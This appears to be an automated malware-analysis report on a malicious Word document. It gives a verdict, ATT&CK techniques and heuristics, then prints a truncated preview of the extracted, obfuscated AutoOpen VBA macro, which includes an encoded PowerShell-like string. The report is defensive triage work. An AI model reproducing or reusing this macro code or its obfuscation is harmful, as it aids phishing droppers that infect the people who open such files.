Verdict: MALICIOUS (Risk Score 202)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV and contains VBA macros, specifically an AutoOpen macro. The presence of a GetObject call within the VBA p-code suggests an attempt to execute code, likely to download and run a second-stage payload. The obfuscated nature of the VBA script prevents a more detailed analysis of its specific actions.
Heuristics (6)
- ClamAV: Doc.Malware.Droo-6896835-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Droo-6896835-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 60289 bytes | 1d105597f7e784cb68577ec72fa5622ceae4f1b9f9796e020640ba6bbdaa6f01 |
Preview script (first 1,000 lines of the extracted script; the listing below is truncated):

```vb
Attribute VB_Name = "BQxQAZAA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "lDUAAAoA"
Function z1AC4_A()
If kCDwBk = KAQQUZ Then
XAwcCCA = 807140381 * TD1AXAA4
nAQA1DD = tQocAAX / 633834143 / 37006607 + 239929723 * 754512655 / 871966521 + (oACCAcA4 - Tan(do11ZG + 855296266 - 577802744 - Oct(jAZUZkc - Hex(788374768) + 890738880 + Oct(349146867))) + (477289878 / Sqr(579910016)))
ncAkAUD = 277580615 * WAAAkDU
End If
If iAUAAoBA = pZ4oZ1 Then
BBoUQAk = 508592674 * ixZ1DZo
WAAAZAD = s4Uko_ / 625922695 / 63763153 + 30750925 * 948672253 / 976040757 + (GQkAoU - Tan(EcAQAA + 220458743 - 51280665 - Oct(UAAA_A - Hex(545446455) + 148057455 + Oct(11176011))) + (674452369 / Sqr(311294999)))
jCwxAGwQ = 673436255 * o4ZABA
End If
If iBUABAZ = lBZAxA Then
sUA4wA = 364649697 * QUUkAAAA
NccAAx = zBDQCA / 164862735 / 797063330 + 825739780 * 911211470 / 917698242 + (BQBDDA - Tan(boQBAA1 + 872297686 - 66724995 - Oct(QZDUDQA - Hex(384780563) + 944842147 + Oct(519499904))) + (208935311 / Sqr(738535774)))
EA_kwA = 208128765 * YcAcoABA
End If
If zAAAZDA = sUkDZA Then
uX4AUQ = 534212628 * hwDAQG
aoBUA1D = OAZAAUZ / 57189296 / 32101116 + 569520364 * 297760706 / 931064337 + (KxwAwCoD - Tan(tcXCU_oA + 865955269 - 63009569 - Oct(UkwQBDZ - Hex(105530356) + 844234208 + Oct(565702656))) + (267762147 / Sqr(912056685)))
LBkBQCAQ = 295431747 * bABGAAX
End If
If uCAAAA = pCZAAA Then
hkAUZA = 451088644 * rAQDQ4A
J_AAowA = HAAXDUA / 278163905 / 194579321 + 191353584 * 212533361 / 544317322 + (hwADowx - Tan(XDADkAww + 944129522 - 310343675 - Oct(M_ACUA - Hex(509784722) + 418391608 + Oct(623713806))) + (678751379 / Sqr(903281591)))
ND_Boc_A = 76635001 * ixQCCcAw
End If
If ucDkUC = SQAAxAk Then
WABkAAAQ = 461516306 * BwQoA4
SAwx_A_4 = tBAU__cA / 123512461 / 822377604 + 552203938 * 364946267 / 321865355 + (HDAxA4 - Tan(UQAwADZ + 615469506 - 813429054 - Oct(icwAA1oo - Hex(472650998) + 610244657 + Oct(155235874))) + (988403145 / Sqr(942477152)))
RAA4ADAD = 671427848 * NBDAwA
End If
End Function
Function R1AoXcU()
On Error Resume Next
If ZZGCk1 = JDD__AA Then
woZ4o4wU = 521969686 * QAUBAAU4
u_AAGCU = sAZAcwUA / 606752164 / 880632365 + 442418111 * 544390013 / 604209456 + (GkcZQA - Tan(KADABXX + 655868125 - 527487444 - Oct(OUAAUAwD - Hex(92131595) + 728374417 + Oct(524104891))) + (990784962 / Sqr(287209824)))
PQcXBA_ = 612878388 * uAo_UwAw
End If
If NUXA4UA = OBZAZZ Then
TAkUAD = 157424435 * zAAkwA
rAA1AA1 = WAoAoB_B / 494891308 / 328545142 + 592800891 * 215982215 / 338932341 + (TQACAc - Tan(JAADoAAA + 843099940 - 990622244 - Oct(F_wD_Q1 - Hex(722506656) + 325570329 + Oct(733723383))) + (405494320 / Sqr(506348481)))
vDADAxU = 139631113 * L_4CAX
End If
If NACBAZx = bwAAxA Then
AABABoc = 680879815 * nAA4Zx
mBG_CU = zCcXAU / 245224203 / 968817610 + 43839049 * 401417920 / 548907961 + (TcAZ1A1Q - Tan(B4CUZUBA + 138840255 - 547002862 - Oct(AUAADQ_B - Hex(111856662) + 464260225 + Oct(80207357))) + (372202813 / Sqr(350495293)))
wA_AUAw = 953983284 * kAA_DUBA
End If
QwBoAA1 = "IAAmACAAKAAgACQAVgBlAFIAQgBvAFMAZQBwAFIAZQBGAGUAcgBFAE4AQwBlAC4AdABPAFMAVABSAGkA"
If PkQADAUC = SQCoUA Then
ECAUUw = 346384682 * IQoQQG
XDAUUA = CAA_AA / 152765075 / 745169039 + 354184191 * 747794806 / 56014307 + (VQAAoQU - Tan(qDAGAGD + 615466887 - 671128934 - Oct(VAAABA - Hex(904113250) + 396352631 + Oct(147568243))) + (428728107 / Sqr(800175746)))
fAB4DQ = 918030212 * h4AABxZ
End If
If iAAAAAZ = JoAAkAx Then
CAwDCAAD = 275221804 * fUBBUAQ
OQxAZDC = uwxGAxU / 144038732 / 306093381 + 124742707 * 731845568 / 69384276 + (KAcZADUD - Tan(ZGZAABo + 229036077 - 149838956 - Oct(EDC_QAB
```

... (truncated)